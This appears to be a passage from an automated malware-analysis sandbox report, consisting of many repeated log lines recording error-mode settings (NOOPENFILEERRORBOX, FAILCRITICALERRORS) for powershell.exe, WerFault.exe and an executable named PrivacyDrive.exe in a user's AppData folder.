Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
